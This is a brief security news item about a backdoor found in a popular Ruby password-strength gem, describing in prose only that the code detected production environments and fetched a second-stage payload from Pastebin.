Ruby Gem Repository Hack

Ruby Gem Repository Hack

A diligent developer’s security practices have uncovered a dangerous backdoor in a popular Ruby library. The library was intended for checking the password strength of user-chosen passwords.

The malicious code would check if the library was being used in a test or production environment. When in production, it would download and run a second payload downloaded from Pastebin.com, a text hosting portal.

Read more about the Gem backdoor here

Close Menu